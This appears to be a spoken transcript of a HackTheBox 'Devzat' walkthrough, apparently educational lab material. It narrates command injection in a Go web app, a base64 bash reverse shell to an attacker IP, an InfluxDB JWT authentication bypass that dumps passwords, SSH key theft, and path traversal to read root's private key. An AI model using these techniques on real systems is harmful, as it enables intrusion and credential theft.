What's going on YouTube? This is Ipsec. We're doing devzat from HackTheBox, which is all about just exploiting Golang binaries. There's nothing too specific like a Go server-side template injection or things like that. It's just a lot of applications that were written in Go that you exploit and do some source code analysis on. It starts off with a web server that explains what devzat is, which is an open source chat application that runs on top of SSH. You can just SSH to port 8000 and with any username and join the chat room. There's not much you can do there. The first step of the box really is running virtual host enumeration on the web server, discovering the pet subdomain, which is a custom Golang application that is vulnerable to a command injection vulnerability. With the shell on that box, you discover there's InfluxDB listening on localhost, which is a database written in Golang. It's running a vulnerable server that has an authentication bypass, so you can dump all the credentials out of there, switch to the Catherine user, where you get access to a dev instance of the SSH chat application that has a LFI vulnerability they can use to read the SSH root key. So with that being said, let's jump in. As always, we begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it devzat, and then the IP address of 10.10.11.118. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and it's running on an Ubuntu server. We also have HTTP on port 80, and is running Apache HTTPD, also on Ubuntu. And then, this one's weird, we have SSH running on port 8000, and its banner tells us it's just a Golang server. And we also have the SSH host key, which is different than the host key for the SSH server. And just knowing Golang, it's got a really cool feature where it has its own built-in SSH server, much like Python has a simple HTTP server. You can just spin up a SSH server in Golang and have user input and output that way. So I'm guessing that's what this is going to be. Also, the host name devzat is an open source application I saw on Reddit a long time ago. If we just Google GitHub devzat, it's a chat application over SSH, which is really cool. But let's go take a look at the webpage. So devzat.htb, and we have to add this to a host file. So sudo vi etc host. And if you're curious how I know this, it came from that nmap scan of it redirecting. So devzat.htb, if we want to pull up the nmap, right here. This did not follow redirect. So devzat.htb, and we get a page. Looks like it's just a single page application talking about this and how to use it. We just ssh-l with a username over to devzat. So I'm going to do ssh-l ipsec port 8000 devzat.htb. Accept this, and we can see chat. So we have a few users. We have Catherine, Root, and Patrick, and admin. So we probably want to take notes of all these users. Catherine running file and then a shrug. Not sure exactly what she's doing there. We can send a message like hello. We can do, I think, /help and get commands, or /commands to get commands. We could do /room. We see we're in main. If I do /all, surprised it doesn't show Catherine or whatnot. It just says admin ipsec. Let's see. What else can we do? We can probably change her name to Patrick. It's reserved for local use, so we can't use that name. I was going to do that because up here we saw Patrick, so maybe I could like take his name and then get his DMs or something. It's just one of the things I would be looking at. But before we go any deeper in this application, we probably should set up some type of recon to have running in the background. So I'm going to try to fingerprint this. If this is index.html, it is. I was hoping it would be PHP because we can find other PHP scripts. But this is probably just a standard static website. So there's not much we can do here. We can try like .git to see if there's a git repo, maybe like robots.txt, but nmap would tell us about that. So there's really nothing we can look at. That's why I'm going to start with a virtual host scan. I guess we could go into the source code, see if there's anything interesting here, or maybe we just run a dir-bust here and get lucky with like a /backup directory. But I'm going to try virtual host first. So I'm going to do gobuster, vhost, and then -u, HTTP, devzat.htb, word list file. We'll do opt, seclist, discovery, DNS, subdomains, 5,000 should be fine. And we'll do out file, gobuster.vhost.out. And we will run this, and oh god, everything is being found. So after this, we'll probably have to filter out 302. We could also filter out 302 within Gobuster, I believe. Like we could say, let's see, Gobuster vhost-h. There should be a flags option that we can use to specify cookies, follow redirect. Let's see, random agent, URL. Let's see, pattern, output string. I know there's a way to do it in Gobuster. I've done it before. But this is why I like the out file. Instead of spending time looking at the output, we can just like grep-v to exclude and say 302. And we see there is another directory, pets.devzat.htb. So if we went back to the top of this Gobuster, we could see, I was hoping it would say headers that are accepted. I wonder if that works for DR mode. This is a random rabbit hole I'm going down, but this is exactly what I do when I'm doing all this stuff for the very first time. Like my application is not behaving like I expect it. I dig into it and see. So I would expect to see something here specifying what an accepted header is. That's changing the method. Timeout, URL string, wildcard. I'm sure if you go in the YouTube comments, someone's going to tell me what this flag is. But if I run this Gobuster with dir mode, let's see what exactly happens. I just want to see if it says flag, because I may be crazy, but I remember maybe it's wfuzz that says, oh, negative status codes. That is what I want. Is that up here? Gobuster. There's no negative status code up here when I do a VHOST scan. So maybe that's something specific to dir that needs to be ported over to vhost, or maybe I'm just using the tool wrong. But dir-h, it would be -b. So this -b flag I think needs to be in vhost. And it's very possible it's there now and I did not update Gobuster, but let's move on. We have pets.devzat.htb. So let's do v-etc-host, pets.devzat.htb, and we can take a look at it. So pets.devzat.htb, and we have a web page. Awesome. So I wanted to try to fingerprint this. So index.php, that's found. So maybe it's a PHP site, HTML, something. So it looks like everything is redirecting me to this my pets thing. So me fingerprinting it did not work. So it's got some type of oddity there. I'm just going to examine the headers. So let's turn intercept off. We can do burp sweep, send this over, and we see it responds 200 OK. The server is my genius Go Pet server. So I'm guessing this is a Golang web server, which again, just like the SSH, it's got a built-in web thing. So Go does good web servers. The only user input is this name a pet. But again, in the spirit of having Recon Go in the background, let's do something here. So Gobuster, dir. We don't want to do a DNS discovery. We want to do web content. And then raft small words dot text, and we'll do gobuster dot pets.dir.out. Sure. So now that that's running, we can take a look at this user input. Name a pet. I'll call it ipsec, and we'll just add this and examine the request. So intercept on. Let's send it over to repeater. We send it, and it says pet was added successfully. And if I go back to this page, maybe it only lasts for a short time. Refresh, we can see ipsec, and it has the characteristics of a cat. So, bit odd here. We have another user input item here on delete. So I'm going to see exactly what this looks like. So intercept on, delete, not implemented. So we can't delete. Go back to repeater. We probably want to see if we can crash this page. So I'm going to put a few bad characters that are known for like databases, and nothing works there. I'm going to go Google SSTI payload detection maybe, and I should turn Grip Suite off. Let's see. SSTI payloads. This Cobalt page is the one I normally grab. Let's see. There is a long string. See if this thing crashes the server. And I say crash the server because it's not really outputting me much user input back. I guess, whoa. That is weird. Let's see. Species cat. Let's just copy this. Oh, it's got a bad character here. Escape that. There we go. So I just got to escape double quotes because I'm within JSON. Like this. Okay. We send it. Invalid period in string escape code. So it doesn't look like it wants that. Pet was added. So there's something with a period potentially. If I look at it, let's do it quickly. Doesn't look like it's SSTI. We have exit status too, which is bizarre. So we crashed it somehow because it's not doing this characteristic thing. Somehow we overwrote into this. So what I'm going to do is erase these like one at a time and see what ends up doing it. That's still status 2. Get rid of that. Status 2. I wonder if it's in my name. Status 2. It's not anything. Status 2. Status 2. This is just cat. Oh. I wonder if species does not exist. You get that message. Exit status 1. So I don't know what those statuses are, but we can get status 1 and 2 somehow, which is bizarre. So going back over to our Gobuster, we can see other directories we got. Images, assets, server password, HT. Nothing yet, really. So let's see. Let's just try the database escapes again. Now that we see output here, we'll probably see some type of exit status because this species does not exist. Exit status 2, but nothing. So we're kind of at a loss for what is going on here. If I do a semicolon, that is interesting. So if I don't do a semicolon, we see having a cat's like a shared department. And then if I do something after this, so like cat A, we have exit status 1. But the semicolon, it's still species cat. And what I'm thinking happens here is we have some type of injection on this species. Because in bash, or any like in a shell command, cat and cat semicolon would be the same thing. Like if I go here and type echo cat and type echo cat semicolon, they behave the same. So I'm going to try sleep +1. Let's do sleep space. Does that work? There we go. I did the plus because of URL encoding, but apparently we don't. And we can see, if I look in the bottom right, everything's taking 1 millisecond. If I do sleep 2, we should see this take 1,000 milliseconds. Now it's taking 2,000 milliseconds. So we have confirmed code injection this way. And I did not actually mean to find that blind like that, because the actual challenge I know has a .git directory, but my recon hasn't told me that yet. So did I just miss it? Nope. Maybe this word list doesn't have .git, because the intended way, which we'll go into, is .git like that. But if you just do a special character fuzz, it does stand out and you can eventually find it. So let's see. grep-ri.git on this, and let's see if it exists. It does. So eventually, I would have found it as long as I didn't make a stupid mistake and do devzat.htb, not pets. So Gobuster dir. Oh, this is now interesting. So because every page returned with a 200, Gobuster's broken. So if I add -- wildcard, we'd probably have to do this and grep out size 510. So if I had done this box more beforehand, I probably would have switched tools and didn't use Gobuster here, because it's obviously not ideal in this size, or in this state. Maybe something like Pharaohbuster would be better. But if I grep-v 510 on gobuster.pets.dir.out, we can see the status code here. So maybe the answer, well, if we made like blacklisted 200, then we wouldn't find files. So I guess this is what you're supposed to do if you do it with Gobuster, is go this way. But we see the .git directory. And also, if you nmapped after you created this host name, I think it would have showed it. But we have .git. We can do a tool called git-dumper. So it's in my op directory already, because I've used this plenty of times before. But if you don't have it, you can just do github git-dumper, and it should be the first result. Yep, a tool to jump a Git repository. So, oh, it's also a pip. Do I just have that? If I do git-dumper, let's do pip3 install git-dumper. Does this install? Git-dumper. Sweet. We can do it this way. So we specify the URL, which is going to be this pets.devzat.htb. Where is it? Go back. Here it is. And then the directory we want to store it, which I'm just going to do git. So let's make this directory. And now it is downloading this Git file, and we'll have the source code to the web application, so we can take a look at exactly where this vulnerability was. So we have go mod, go sub, main.go. I'm going to start with main.go. And the main thing I want to look at is where user input is. So I'm just scrolling down, and right here we can see the exact injection, but we could see this and go off here because we see shell-c and then cat characteristics plus the species. But I'm not really satisfied with this, because even though we'd know this answer, we didn't really learn anything other than a specific vulnerability to this application. Like, I want to know exactly how user input gets here, because normally when I do static code review, I always look for all the areas where there's user input, and from this one function that I'm looking at, I don't know how user input got here. So I'd be keeping going down, and it looks like whenever I include this http.request, we have user input in that function. So what I would do is grep http.request on main.go. It's probably like a capital R. Yeah. and then go through each of the functions that turn up, because this is where we can potentially include things. So I'm going to look at get pets. So we can do get pets, and right here, I don't really see it using user input. We just have it writing to the web request, right? It's never loading something. If I look at add pet, which is the next one, so if I do add pet, we can see it reading the request right here with this io-util read all, and then r.body. And then we create the, I guess, structure or something, pet, named add pet. And right down here, this thing, json.onMarshal, we're taking the request body that we read right here, and then sending it to this add pet variable. And let's see if the error is, if there's an error, we write the error. And then we do add pet.characteristics is equal to load character add pet.species. So this add pet.species is the exact thing right here, the species thing here. So this is the user input that we're writing. And then we look at the load character function, and we see the command injection. But because we've traced this whole application, if that wasn't vulnerable or there was a second vulnerability in it, maybe that was just LFI, because that is also an LFI vulnerability. Because if we do that cat, let's see, where is it? Come on. Load. Here we go. So let's say semicolon was a bad string. Maybe they had something here doing some type of filtering, and semicolon was a bad string, and we missed that vulnerability. Well, it's still a local file inclusion. We could test for that. So instead of cat, we can try slash. Because we did speech, we're going cat, this file, or this directory, this file. So we turn that file into a directory. So now we can do a normal directory traversal of ... slashes and passwd. So if I do that, we go back to this page. So hit this, refresh. Maybe we don't want to specify a file. Maybe just do a directory traversal there. Come on. Is this going to be vulnerable? I don't see it. That is bizarre. Let's see. It's adding me into species. Wonder if we need like the exact number of slashes. Come on. I'm going to try. Oh, I don't have Etsy. The stupid mistakes you make when you talk and type. There we go. Etsy passwd. And we have the file. I wonder if I had cat, if that would work. So if I did it like this, how does this work? Is it no file? Yeah, no file. So I did that because every like programming language is slightly different. I think in Java, this may have worked. And there's some programming languages where if you open a file and you're at slash and you do ... slash, it errors out. So you would have to know the exact number of ... slashes in order for it to behave as you're expecting in LFI. But those are just the things you kind of learn with experience. And me doing that task, you saw I just removed one of those directories and the LFI still worked. So I know this application isn't like that. And there we go. So we can guess exactly where the file is by knowing the exact number of slashes. So this is another enumeration you can do with an LFI. Come on. So let's try one more. There we go. So we know there's 4 directories before we hit the root directory. So var, www, HTML, pets is what I'm thinking, right? We can confirm we're not in Etsy because we could remove one, and this is going to break it, right? And we no longer have the LFI. But we can get rid of Etsy, and if this application was running somewhere in Etsy, we'd be able to read this file because going up these 3 directories would drop us in the /etc directory, but that's not the case. So that's a lot of extra stuff for something we knew we had RCE in. But that's generally like the thought process I go around, and why even after I find the RCE, I dig a bit further to find a potential, like how it works, because there may be something you're missing. And if you go digging down one rabbit hole too long without exploring all the holes, you may just waste a lot of time, because it doesn't take that much time to cast your net wide. So I'm going to do echo-n. We can do bash-i. Actually, just bash-, let's see. Yeah, bash-i. And then dev tcp 10.10.14.8 0 at and 1, like this. And then we can base64 encode this. And I want to get rid of the pluses just because I hate dealing with URL encoding. I doubt it would be an issue, but did I make a typo here somewhere? Yeah, I did. It's also a good sanity check for me because I knew just adding that one space would not work. I forgot the port here. But I hate troubleshooting issues because of encoding. So when possible, like, I try to remove all possible errors. Like, we can test it out by just sending this payload first. So if I send this, let's see if it'll work with this. So copy, we can go here, species, semicolon, echo, -n, our string, base64-d, pipe it over to bash. We can do nc lvnp 9001, send it, we got a shell. So doing this whole URL encoding thing doesn't help us in the least here because it worked beforehand. But if we did have an error, something like this would prevent us having that error and wasting time. Because if plus is a bad character because the server does some URL encode, breaks the base64 by adding this plus, like converting the plus into a space, the server did that, we break. But just a pure alphanumeric payload is often going to be much more reliable than anything else. So that's why I take those like 10 to 15 seconds to convert my reverse shells when I do a base64 cradle like this. And let's see. As I say, I had an error message because I thought this would be like foolproof and I wouldn't make a mistake here, but apparently I did. Bash-i, dev tcp 10.10.14.8 9001. Nope, that looks correct. I wonder if I screwed something up here. Let's just retype this whole payload. So echo-n, paste this, base64-d, bash. There has been an error. Invalid character R at the beginning of object string. I added res here where the species is. So that was my issue. It was me just screwing up the request. But now I'm in this pets directory with Patrick, so let's get a proper shell. Python 3-c import pty.spawn, bin bash, control z stty raw minus echo. And I'm also going to do semicolon fg. And now we should have the up arrow. And I can also clear the screen if I do export term is equal to xterm. There we go. So we did kind of miss one type of enumeration step that I would normally be doing, and that is looking at the git files. So we have this git directory, we could do git log, and we could also go back to like the init commit or do like git diffs against these to see if there's anything we really missed. Maybe there's a different hard-coded credential in SSH key or something like that. I don't think there is. You could also do it on this box as well because we just downloaded off this web server. But generally, this is an SSH application. And when I tried to switch my nickname to Patrick, I do ssh-l patrick-p 8000 10.10.11 158, I believe was the port or the host. Maybe it's 153. What is devzat? I can just do it off of the host name, right? devzat.htb. That's why DNS exists. but we have nickname is reserved for local use. So we could potentially go into his SSH directory, see if there's a private key, which there is, so I can cat ID RSA. We can copy it over to my box and see if we can now get on as the Patrick user. So we can do vi patrick.key, paste it in, chmod 600, and then that same SSH command, but this time do a -i patrick.key, and it still says reserved for local use. So, oh, now with the name exit. Oh, that's funny. It's /exit to exit. It says local use, so I'm going to try ssh-l patrick, and then 127.0.0.1. I forgot the port of 8000. Accept the key, and we get in as Patrick, and something weird happened. That was weird. It says Patrick admin, and it's not telling us text. Let's try this again, and still doing the same thing. Let's see. IP-ADDR. I want to say those are supposed to be messages between Patrick and admin. I don't know why they aren't. 10, 10, 11, 118. Yes. This box is behaving very oddly. We can try like SSHing as a different user. So I'm going to leave this as 127.0.0.1. And I'm going to try logging in as admin. And we still see some messages. I'm going to try switching to SSH. So ssh-i patrick.key, patrick at devzat.htb. We should be able to log in as him with this key. So we're not doing a reverse shell. sh-l patrick-p 8000 127.0.0.1. So we can see something weird happening. If we do it from SSH, we see text. If we do it from the reverse shell, we do not see any text. My guess is this is probably being transmitted over like Unicode or something like that, and a reverse shell just drops that whole text. It's really bizarre. I did not expect this behavior, but now we can see the message from Patrick, and this did show me something interesting. I think we can impersonate other users, but reading this, we see the admin set up InfluxDB and says, be sure to check it out. And Patrick says, yes, he's on it, admin leaves. So I'm going to try SSH admin. What happens if I do this? Does it prevent me from logging in as admin? Nope. It still says I'm now admin, and we have the message. The other user was Catherine. So we can probably impersonate Catherine because it's not asking us passwords. And we can see a message from Patrick, and it says, hey, Catherine, glad you came. And it's talking about them implementing a local dev instance on port 8443. So there's two things on this box that we want to look at. Whatever InfluxDB is, and also port 8443. So I'm going to do SSLNTP, I think A. And let's do less-s so we get rid of this weird line wrapping because I just hate it. I like it like this better. So I can go right if I want to. But let's see. We have 8443 here. We can't really see any information about it. There's 8086. Let's see. We know what 22 is. 5000 is running pet shop, so we know that. Python 3 on 57322. Okay, this is my reverse shell. We see it calling back to me on 9001. That's another ephemeral port. This is SSH. 47264. It's in time wait, not listen, so I'm not that interested in it. That was probably me connecting to the dev chat instance. So there's two ports we want, 8443 and 8086. So if I do a, let's see, do we have NC? We do not have NC. We can probably just curl. So curl 127.0.0.1, 8086. 404 page not found, so that's a web server. And then the other one was 8443. So we can do 8443. We probably have to do like -k HTTPS, I would think. Wrong SSL version number. That is weird. We can do SSH-L and do Patrick, and then -P8443. Yeah, so this is running SSH, and it's a different chat server. So, /commands, there we go. And we can look at the difference between the two chat servers. So if I do SSH-L, name doesn't matter, /commands. Let's just exit this reverse shell. We can do SSH-L. With Patrick, we don't need that. We can just do ipsec. And we can do /commands here. And see, there is an extra command called file, and it's in alpha. So it pastes file directly to the chat. If I do /file, you can do etc passwd, and it needs us to provide a password. So we don't have the password. We'd have to be able to like find where this binary is running, or like create a brute forcer and try to brute force the password, or find source code somewhere on this box. But the first step we can do is this InfluxDB that was on port 8086. So I'm going to add the -v flag so I can see server headers. Not capital V, I want lowercase v. And we see we've confirmed it is InfluxDB running version 175. So if I go to exploit DB, and we could also do searchploit on our box. I just like using exploit DB when I can because I know it's going to be up to date. We can look at InfluxDB, and we have no searches found. Try just influx, nothing. So I can go like Google InfluxDB exploit, see if there's anything on Google. We have this GitHub repository. I'm probably not going to look at it too much because it was, I think, created for this box or around the time of this box. I see it updated in February. This may be when the box released, so I try to avoid those type of things when doing videos. We have InfluxDB enumeration utility from 2018. We have this thing on hack tricks. The one thing I missed is we can do InfluxDB 175 changelog. And I like doing changelog because this gets me the date things were released. So let's see, that's 1.8. Is there a 175 entry? So 175, 2019. So if we look at the next version up, we can see what happens. Bug fixes, ensure credentials are correctly parsed when executing Flux HTTP request. This sounds interesting. Fix panic, add version. We can maybe search this for security. Security level, these are old. So it looks like there may be a bug with authentication fixed. I think synk may have something. I think that I pronounced that correct. If I do synk InfluxDB, this is just another like vulnerability database, and this is looking at the npm package. I don't want that. Let's just see if we can find it this way. InfluxDB, we can search. Let's see, that's Grafana. Improper authentication, here we go. So if I click on InfluxDB to look at this package, we see this. Does this say what version it was fixed? I may have to sign up to see that information. Oh, no, right here. InfluxDB before 176. So we can find it either way. If we're lucky, we find some type of report that says something like this, like authentication bypass before 176. That is obviously pointing us to the right thing. If we do influx, let's see, where's that changelog? If I look at my history today, 404, oh, come on, is it not there? Release notes. There we go. So 176, I'm guessing ensure credentials are correctly passed is code name for the developer saying there was an authentication bypass. So the other place I would go to once I know there's a vulnerability I'm looking for is their GitHub page, because this is an open source database. So I'm just going to do a GitHub search on InfluxDB. If we search this, we can go here, look at the issues, and we want to look at closed issues. And I'm going to search for like password authentication. And if we scroll around probably a 2019 timeframe, here we go. We have one tagged as security. I can click on the security tag also and see every security vulnerability. So if we don't search by password authentication, just look at label security, this could also be another good way to find vulnerabilities that would be vulnerable to. But this password bypass vulnerability says we can authorize any user as long as we have an empty shared secret in our JWT token, and goes on explaining why. The one thing I do want to point out is when we make a JWT token, we also need to know the structure of the token. So in here, I'm looking at the source code. This is where the person linked me to. And I'm specifically going to look at it, assign the claims. So it's looking for the EXP, which is expiration, username from the token. And that looks like it is it from the JWT token. So we just need to create a JWT token with an empty secret that has a username and expiration. So I'm going to do jwt.io. And let's see. We don't need, this sub, which I think is the subject, but they use name, or username, right? Was it username? Let's go back here. Claim, username. So that's what they use. And we know the users are going to be Joe, Catherine, or admin. If I'm impersonating anyone, I'm going to impersonate admin first. And then expiration, it's probably just going to be an epoch time. So EXP, and we want to get the current epoch time and then add something to it. So current epoch time, go to Google. I guess click on this. Get this time. This is just time since the epoch, which is like 1960, I believe. When did epoch start? January 1st, 1970. I was a decade off. So this is in seconds. I'm just going to say, we'll change this to a 2. This is going to be really far into the future. So let's see. We can probably go to epoch converter. Do we have it right here? If I put what I put in, we're now, let's see. I made it. Ooh, that did not go as far in the future as I thought. But let's see. Current timestamp is this. So 5/24/57. And what did I change it to? We may want to go even farther because we don't want the token expiring on us when we're doing this video. I thought a 2 in that spot would work fine. Yeah, there's only like 3 hours. So I'm going to change this one. There we go. We're a few days. Monday, March 14th, 2022. So this will be a few days. I'm creating this video on Friday. So if you're watching this the day it goes live, I recorded it yesterday. Where's JWT? Right here. Paste it in. And our secret is blank. I'm going to, we don't know if it's encoded or not. I wonder if I could quickly find that from the source code. Let's see, does this base 64? Let's see, encode. I don't know how Golang's doing it. I want to say I need to include this. If it doesn't work, I'd grab the secret without it, base 64. I find it funny that base 64 encoding, oh wait, it's not blank. It had data there. There we go. It doesn't matter because there's no signature. It's just blank. That's what I expected. So we can grab this and let's see. We got to look at InfluxDB, example request. How to write data to InfluxDB. Let's see. Curl. API. Here we go. So we want query. We probably don't want to create database. Let's see. Authorization, token, username, colon, password. We're probably going to use something called bearer, I believe. But let's see. Write InfluxDB show databases API. And we can get, I guess, an example here. It still says DB, but I'm going to just play with this real quick and see if we can get to show databases without using this query. Well, without something. Let's see. We got the curl. We're hitting /query, saying pretty true. We just ran this, unable to process authentication. So I'm going to add the header. I'm going to say authorization, bearer, and then the JWT token. And this is just the standard way you use JWTs. If you look at like the HackTheBox API, you'll have a bearer token. And oh God, I just pasted again when I did not want to. Authorization, bearer, BEAR. I think that's it. There we go. And database not found. So we're making progress. I'm going to make this a bit easier to use because I don't want to have to keep using this curl query. Let's see. cd dev shm v query.sh. Paste this in. Let's see. We can get rid of data URL encode db equals my db. And then we can just do this. And I'm going to try just putting $1 here, which in bash should put the first argument. So if I chmod plus x query.sh, we probably want to put the shebang in, then bash. So I can now do /query. And if I do show databases, does this do anything? Show database. Missing parameter q. Let's see. I probably want to do q equals, because I had deleted that. So q equals would be query equals. Let's see. Person query. Expected. I probably should put this in quotes, because I ran a show command, but how I did it, because I just did argv1 and bash, it only sent show to it. So wrapping it in double quotes shows me things. So now we have the databases devzat and internal. So we can modify our query back to how it was and say data URL encode db is equal to my db. Instead of that, we put devzat or internal. But I want to look at the devzat. So I'm just going to modify this. And we can say devzat. And I also want to try something real quick. vtest.sh echo. I think I do that. Let's see. Bash test.sh. Hello world. Okay, that's all arguments. So before, I'm just using $1. If I run this, it just says hello. If I put it in quotes, then bash knows that whole thing is my first argument. But if I just want everything, I can just do $@, and that works fine. So I'm going to edit query to switch to $@. There we go. So now if I do query, we can do show measurements is I think how you look at tables in InfluxDB. Let's see, show measurements. I probably have a typo. There we go. Wait, what? Show measurements. Could not resolve host. Still want it in quotes. What? I'm not going to pretend I know what's happening. I have no idea. But we can see this show measurements has a table of user. So I can probably do a select star from user. Unable to... Do I need a semicolon? Let's see. Error parsing, found name. Let's see. If I echo that first, I'm passing the whole thing. thought that would be it. Found name, expected identifier string. So if I do select star, found user, expecting identifier. Let's try putting this on Google. Let's see, 15. We don't need that line. Okay. Oh, InfluxDB. Oh, wait. Cannot create a username with name user. Create user, password with all privileges. Wonder if we have to do it in quotes. Let's see, create database username. Yes, it's doing it in quotes. And they specifically say double quotes. I'm going to try a single quote. Get rid of that semicolon. So I wonder if we escape it and put double quotes. There we go. So that was it. The reason why we had escape it is because we have this in quotes as well. I wonder if I did not do that. If I use single quotes on the outer, do it this way, then it would work as well. So if you didn't want to escape it, you could just do single quotes on the outer. And we have 3 things. Wilhelm is password Willy Wonka, I'm guessing. And I'm guessing this is enabled because we see Charles and Catherine have true here. One is false. I don't know who this is. Maybe this is the administrator's name. I don't see Patrick either. So username, password, enable time. So Catherine exists on the box. I don't know who Charles and Wilhelm is. They're not on this. So I'm going to try SU to Catherine and then paste her password and we get in. And that's where user.txt is. We can do an LSLA. There is a SSH, but no private key. So at this point, when we do SSH-L Catherine, we can look at this message again. So let's see, port 8000/127.0.0.1. Sure. And we get the message from Patrick saying, could you connect to the local dev instance? You'll need the password I gave you last time. Patrick saying he left the source for your review and backups. And that's it. So, whoops. Paste that password again. Hopefully I still have it on clipboard. Oh, shoot. SU dash. Paste. I don't think I have that password on clipboard. Select. Oh, that is her password. Help if I specify I want to go to the Catherine user. So we have to find where those backups are. We can probably do a find dash and say dash user Catherine, and then pipe all error messages to dev null and see what we find. A lot of things in proc. So we can also do dash ls if we want to show ls probably has to come after the user. It's really weird because we can see root. There's no reason I should see that with dash user Catherine. So you want to do the dash ls flag last in the find command. Then we could also grep dash v proc because we don't care about that. Grep dash v proc after the direct. And we can see all the files owned by Catherine. There's devzat main and devzat zip. So we have 2 files here. We probably want to send them over to our box. And we can see only Catherine can read and write to it. So I had known that ahead of time. That's why I didn't go hunting for this file when I was the Patrick user. Just because hindsight told me not to, because I knew I remembered this piece from before. But we should download these files. So var backups. And we can, let's see, Python 3-m, HTTP server. We'll put it on 8001. I should be able to download them. So wget devzat.htb 8001 / devzat main and devzat zip. Okay, so we have both of those. Let's stop this web server. And then let's do make dir source / main zip. We have to add a -p because the source directory does not exist. And I'm going to go main unzip devzat main.zip. And you can guess it. I'm going to go into dev. Thought I created the dev. Oh, mv zip to dev. And we can unzip devzat dev.zip. So now we have 2 files. So the next thing I want to do is, let's see, what could we do to diff these? We could probably find a way to diff folders. Let's see, we can do also find dot, then exarg, so we could probably just exec is equal to md5 sum, I think like that. So if I just exec md5 sum dash exec md5 sum, there we go. We probably want dash type f for files, and then we can awk print 1. So now we have just a list of MD5 files. And if I sort MD5s and then unique -c, and we only want the MD5 sums that have a 1. So now I can awk this. And this is probably a horrible way to do it. It's a weird way that like I always do it. Again, never sure if this is the optimal way. So now we have a list of unique MD5s. So we can go back to our exec command. Get rid of that awk. So now this output is just, let's see, find that. Okay. We can grep -file unique MD5s. That's not what I wanted to do. There we go. Lowercase f. So this is a list of all the unique files. If you could follow that weird train of logic. But we probably only care about dev. And we have all users, dev chat, commands, and test file. I'm going to look at what test file is. Don't know. Maybe that's the file they're including. Because remember when we SSH to port 8443, there was a file command that looked like you could include files. So maybe test file is related to that. We could probably grep-r test file on dev. And it doesn't exist, so that's not hard-coded anywhere. We can also do a diff dev commands.go and main commands.main or .go and see what is different here. Guessing all these lines are in the new. So yeah, command file, paste file contents. So we want to look for where the password is. And we have it right here. So pretty much done. So we got the password. We just want to look at how that works. So let's see, commands.go. Here's a password. So this is what it's checking. Get CWD, print path. So here's it opening, OS stat on print path. So I guess we just have to figure out what user this is running as, because it's going to print the contents of this file, whatever we specify. So let's go back to Catherine, SSH-L, doesn't matter who we are, IPsec. It just matters we specify the port, 8443. And we can say file, etc, passwd, paste in the hard-coded password. And I thought that would work. Let's see, help. Oh, I just made a big no-no. I'm sending the message to chat. So anyone in this chat room would see my command. Let's see. So I do file. It says the requested file root devzat etc passwd does not exist. So if I do .. we get passwd. We could also grab the shadow file. And we could also check if root has a SSH key. So ID underscore RSA. Let's see. File root devzat. So we just want to go up one directory. So doing up one places us at /root. That is a small key, but let's grab it. Okay. V, let's go up 2 directories, 3 directories, v root.key, paste it. 1, 2, 3, 4, 5, 6, 7, 8, 9. So I just hit 9x, and we can delete all these lines. chmod 600 root.key, ssh-i with it, 1010, or let's just do devzat.htb, and we get in. So there you have it. That is root on this box. I was kind of curious about, let's go back in that dev source. So let's see. Source dev v commands.go. There we go. Here's the password. Okay. Oh, so here's where it gets that root devzat thing. We're doing a CWD, and then print path is joined CWD plus path. I was kind of curious why I couldn't just specify etc passwd where it was getting the root devzat thing. And that is this line of it just making print path the combination of CWD plus path. So, hope you guys enjoyed the video. Take care, and I will see you all next time.